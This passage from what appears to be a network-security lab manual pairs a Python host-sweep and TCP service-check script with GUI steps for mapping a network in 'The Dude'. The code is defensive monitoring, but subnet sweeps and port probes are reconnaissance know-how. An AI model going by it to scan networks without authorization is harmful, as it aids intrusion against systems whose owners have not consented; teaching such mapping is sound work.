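    return [str(host) for host in ipaddress.ip_network(cidr, strict=False).hosts()]


def check_service(host: str, port: int, timeout: float = 1.0) -> bool:
    """'reliable' mode as assumed here: a service counts as up only if a TCP
    connection to it succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def choose_device_name(names: dict, preference=NAME_PREFERENCE) -> str:
    """Pick the display name from the first source in the preference order
    that produced one; the IP address is the fallback of last resort."""
    for source in preference:
        if names.get(source):
            return names[source]
    raise ValueError("no name available from any source")


def monitor_services(targets, timeout: float = 1.0) -> dict:
    """Probe every (host, port) pair; True means the service answered."""
    return {target: check_service(target[0], target[1], timeout) for target in targets}


def down_services(status: dict) -> list:
    """The targets a monitor would raise an alert for."""
    return [target for target, up in status.items() if not up]


def start_local_listener() -> socket.socket:
    """Constructed stand-in for a monitored device: a TCP listener on a free
    loopback port that accepts and closes connections in the background."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(5)

    def serve():
        while True:
            try:
                conn, _ = server.accept()
            except OSError:      # listener closed, stop serving
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return server


def free_loopback_port() -> int:
    """A port nothing listens on (bound and released), for the 'down' case."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
        probe.bind(("127.0.0.1", 0))
        return probe.getsockname()[1]


if __name__ == "__main__":
    hosts = hosts_in_network("10.0.0.0/24")
    print(hosts[:3], "...", len(hosts), "hosts to scan")
    device = start_local_listener()
    port = device.getsockname()[1]
    status = monitor_services([("127.0.0.1", port), ("127.0.0.1", free_loopback_port())])
    for target, up in status.items():
        print(target, "up" if up else "DOWN - alert")
    # Constructed name table: no DNS name, but SNMP returned one, so SNMP wins.
    print(choose_device_name({"DNS": "", "SNMP": "gateway", "IP": "10.0.0.1"}))
    device.close()
```

The timeout is the parameter that separates a fast sweep from a reliable one: the lab's "fast (scan by ping)" mode needs only one probe per host, whereas the per-service check above costs one connection attempt per service per host, so the host list from hosts_in_network should be kept to the subnets you actually administer.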
FIGURE 18.8: Overview of network connections

8. Select a device and place the mouse cursor on it to display the detailed information about that device.

FIGURE 18.9: Detailed information of the device

9. Now, click the down arrow for the Local drop-down list to see information on History Actions, Tools, Files, Logs, and so on.
FIGURE 18.10: Selecting Local information

10. Select options from the drop-down list to view complete information.

FIGURE 18.11: Scanned network complete information
11. As described previously, you may select all the other options from the drop-down list to view the respective information.
12. Once scanning is complete, click the button to disconnect.

FIGURE 18.12: Connection of systems in network

Lab Analysis
Analyze and document the results related to the lab exercise.

Tool/Utility: The Dude
Information Collected/Objectives Achieved:
IP Address Range: 10.0.0.0 to 10.0.0.24
Device Name Preferences: DNS, SNMP, NETBIOS, IP
Output: List of connected systems and devices in the network
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Internet Connection Required
☐ Yes ☑ No

Platform Supported
☑ Classroom ☑ iLabs